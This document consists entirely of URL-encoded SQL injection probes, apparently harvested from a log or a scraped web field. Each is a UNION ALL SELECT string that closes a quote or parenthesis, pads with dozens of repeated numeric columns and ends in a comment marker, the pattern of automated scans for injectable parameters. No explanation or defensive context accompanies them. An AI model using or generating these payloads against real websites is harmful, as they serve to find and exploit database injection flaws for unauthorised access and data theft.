-1813%27%20UNION%20ALL%20SELECT%208776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776%2C8776--%20 -3558%27%20UNION%20ALL%20SELECT%205069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069%2C5069--%20 -1892%27%20UNION%20ALL%20SELECT%203610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610--%20 -6895%27%20UNION%20ALL%20SELECT%207251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251--%20 -9872%27%20UNION%20ALL%20SELECT%205888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888%2C5888--%20 -4658%27%20UNION%20ALL%20SELECT%202842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842--%20 -7157%27%20UNION%20ALL%20SELECT%201560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560%2C1560--%20 -5429%27%20UNION%20ALL%20SELECT%206000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000--%20 -3711%22%29%20UNION%20ALL%20SELECT%202745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745--%20 -6494%22%29%20UNION%20ALL%20SELECT%207047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047%2C7047--%20 -7078%22%29%20UNION%20ALL%20SELECT%209324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324--%20 -7922%22%29%20UNION%20ALL%20SELECT%204967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967--%20 -9425%22%29%20UNION%20ALL%20SELECT%208482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482--%20 -6417%22%29%20UNION%20ALL%20SELECT%208649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649--%20 -4850%22%29%20UNION%20ALL%20SELECT%202936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936--%20 -8545%22%29%20UNION%20ALL%20SELECT%202930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930--%20 -8667%22%29%20UNION%20ALL%20SELECT%206249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249--%20 -9653%22%29%20UNION%20ALL%20SELECT%207308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308--%20 -7064%22%29%29%20UNION%20ALL%20SELECT%209089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089--%20 -3594%22%29%29%20UNION%20ALL%20SELECT%202203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203%2C2203--%20 -8004%22%29%29%20UNION%20ALL%20SELECT%202589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589%2C2589--%20 -7440%22%29%29%20UNION%20ALL%20SELECT%201423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423--%20 -5977%22%29%29%20UNION%20ALL%20SELECT%207116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116--%20 -4107%22%29%29%20UNION%20ALL%20SELECT%206062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062--%20 -2189%22%29%29%20UNION%20ALL%20SELECT%203439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439%2C3439--%20 -6078%22%29%29%20UNION%20ALL%20SELECT%207277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277%2C7277--%20 -7952%22%29%29%20UNION%20ALL%20SELECT%205472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472--%20 -9486%22%29%29%20UNION%20ALL%20SELECT%205798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798%2C5798--%20 -9006%22%29%29%29%20UNION%20ALL%20SELECT%207540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540--%20 -4745%22%29%29%29%20UNION%20ALL%20SELECT%201662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662--%20 -9095%22%29%29%29%20UNION%20ALL%20SELECT%204471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471%2C4471--%20 -8591%22%29%29%29%20UNION%20ALL%20SELECT%206820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820--%20 -3636%22%29%29%29%20UNION%20ALL%20SELECT%206698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698--%20 -4475%22%29%29%29%20UNION%20ALL%20SELECT%202832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832%2C2832--%20 -5391%22%29%29%29%20UNION%20ALL%20SELECT%201703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703--%20 -9311%22%29%29%29%20UNION%20ALL%20SELECT%207988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988%2C7988--%20 -4048%22%29%29%29%20UNION%20ALL%20SELECT%206242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242--%20 -2134%22%29%29%29%20UNION%20ALL%20SELECT%209825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825--%20 -9062%22%20UNION%20ALL%20SELECT%202218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218--%20 -2779%22%20UNION%20ALL%20SELECT%201460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460--%20 -5310%22%20UNION%20ALL%20SELECT%205403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403--%20 -3624%22%20UNION%20ALL%20SELECT%202860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860--%20 -7398%22%20UNION%20ALL%20SELECT%205808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808--%20 -5112%22%20UNION%20ALL%20SELECT%201318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318--%20 -4998%22%20UNION%20ALL%20SELECT%202893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893--%20 -4440%22%20UNION%20ALL%20SELECT%202063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063--%20 -7194%22%20UNION%20ALL%20SELECT%204392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392--%20 -9168%22%20UNION%20ALL%20SELECT%204380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380%2C4380--%20 -1092%22%29%20UNION%20ALL%20SELECT%206385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385%2C6385--%20 -4446%22%29%20UNION%20ALL%20SELECT%207648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648--%20 -2736%22%29%20UNION%20ALL%20SELECT%207645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645--%20 -7236%22%29%20UNION%20ALL%20SELECT%208659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659%2C8659--%20 -9612%22%29%20UNION%20ALL%20SELECT%207737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737--%20 -1692%22%29%20UNION%20ALL%20SELECT%204367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367--%20 -9886%22%29%20UNION%20ALL%20SELECT%201579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579--%20 -8659%22%29%20UNION%20ALL%20SELECT%206719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719--%20 -2546%22%29%20UNION%20ALL%20SELECT%202172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172%2C2172--%20 -8745%22%29%20UNION%20ALL%20SELECT%204405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405--%20 -3276%22%29%29%20UNION%20ALL%20SELECT%203120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120%2C3120--%20 